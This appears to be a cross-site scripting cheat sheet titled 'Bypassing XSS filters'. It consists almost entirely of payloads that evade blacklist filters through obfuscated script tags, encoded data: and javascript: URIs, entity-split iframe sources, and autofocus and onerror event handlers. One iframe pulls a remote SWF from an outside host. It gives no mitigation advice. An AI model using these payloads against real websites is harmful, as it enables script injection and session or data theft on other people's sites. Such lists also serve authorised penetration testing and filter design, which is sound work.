Bypassing XSS filters

In the XSS world, there are many tags, events, attributes can be used to execute js.

• Tag can execute js
  <script> <a> <p> <img> <body> <button> <var> <div> <iframe> <object> <input> <select> <textarea> <keygen> <frameset> <embed> <svg> <math> <video> <audio>
• The events are execute js:

  onload onunload onchange onsubmit onreset onselect onblur onfocus onabort onkeydown onkeypress onkeyup onclick ondbclick onmouseover onmousemove onmouseout onmouseup onforminput onformchange ondrag ondrop

• Properties can execute
  formaction action href xlink:href autofocus src content data

Bypassing

• Use any tag for bypassing  harm tag blacklist
  <M/onclick=”alert(1)”>M
• use “/” instead of spaces
  <img/src=x onerror=alert(1)>
• use short xss payload
  <b/ondrag=alert()>M
• data URI
  <a href=javascript:alert(2)>M
  <a href=data:text/html;base64,PHNjcmlwdD5hbGVydCgzKTwvc2NyaXB0Pg==>
  <a href=data:text/html;%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%2829%29%3C%2F%73%63%72%69%70%74%3E>M
  <a href=j&#x61;v&#97script&#x3A;&#97lert(13)>M
  <a href=javascript&colon;confirm(2)>M
• combination to xlink:href
  <svg><a xlink:href=”javascript:alert(14)”><rect width=”1000″ height=”1000″ fill=”white”/></a></svg>
  <math><a xlink:href=javascript:alert(1)>M
• script tag
  <script>alert((+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]])</script>
  <script firefox>alert(1)</script>
  <script>~’\u0061′ ;  \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073.  \u0061\u006C\u0065\u0072\u0074(~’\u0061′)</script> //
  <script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script>
  <script>prompt(-[])</script>
  <script>alert(String.fromCharCode(49))</script>
  <script>alert(/7/.source)</script>
  <script>setTimeout(‘alert(1)’,0)</script>
• button tag & html5
  <button/onclick=alert(1) >M</button>
  <form><button formaction=javascript&colon;alert(1)>M
  <button onfocus=alert(1) autofocus>
• <p> tag
  <p/onmouseover=javascript:alert(1); >M</p>
• <img> tag
  <img src ?itworksonchrome?\/onerror = alert(1)>
  <img src=x onerror=window.open(‘http://google.com’);>
  <img/src/onerror=alert(1)>
  <img src=”x:kcf” onerror=”alert(1)”>
• <body> tag
  <body onload=alert(1)>
  <body onscroll=alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
• <var> tag
  <var onmouseover=”prompt(1)”>KCF</var>
• <div> tag
  <div/onmouseover=’alert(1)’>X
  <div style=”position:absolute;top:0;left:0;width:100%;height:100%” onclick=”alert(52)”>
• <iframe> tag
  <iframe  src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>
  <iframe  src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
  <iframe SRC=”http://0x.lv/xss.swf”></iframe>
  <IFRAME SRC=”javascript:alert(1);”></IFRAME>
  <iframe/onload=alert(53)></iframe>
• <meta> tag
  <meta http-equiv=”refresh” content=”0;javascript&colon;alert(1)”/>?
  <meta http-equiv=”refresh” content=”0; url=data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E”>
• <object> tag
  <object data=data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4=></object>
• <marquee> tag
  <marquee  onstart=”alert(‘sometext’)”></marquee>
• <isindex> tag
  <isindex type=image src=1 onerror=alert(1)>
  <isindex action=javascript:alert(1) type=image>
• <input> tag
  <input onfocus=javascript:alert(1) autofocus>
  <input onblur=javascript:alert(1) autofocus><input autofocus>
• <select> tag
  <select onfocus=javascript:alert(1) autofocus>
• <textarea> tag
  <textarea onfocus=javascript:alert(1) autofocus>
• <keygen> tag
  <keygen onfocus=javascript:alert(1) autofocus>
• <frameset> tag
  <FRAMESET><FRAME SRC=”javascript:alert(1);”></FRAMESET>
  <frameset onload=alert(1)>
• <embed> tag
  <embed src=”data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4=”></embed> //chrome
  <embed src=javascript:alert(1)> //firefox
• <svg> tag
  <svg onload=”javascript:alert(1)” xmlns=”http://www.w3.org/2000/svg”></svg>
  <svg xmlns=”http://www.w3.org/2000/svg”><g onload=”javascript:alert(1)”></g></svg>
• <math> tag
  <math href=”javascript:javascript:alert(1)”>CLICKME</math>
  <math><y/xlink:href=javascript:alert(51)>test1
  <math> <maction actiontype=”statusline#http://wangnima.com”
  xlink:href=”javascript:alert(49)”>CLICKME</maction> </math>
• <video> tag
  <video><source onerror=”alert(1)”>
  <video src=x onerror=alert(48)>
• <audio> tag
  <audio src=x onerror=alert(47)>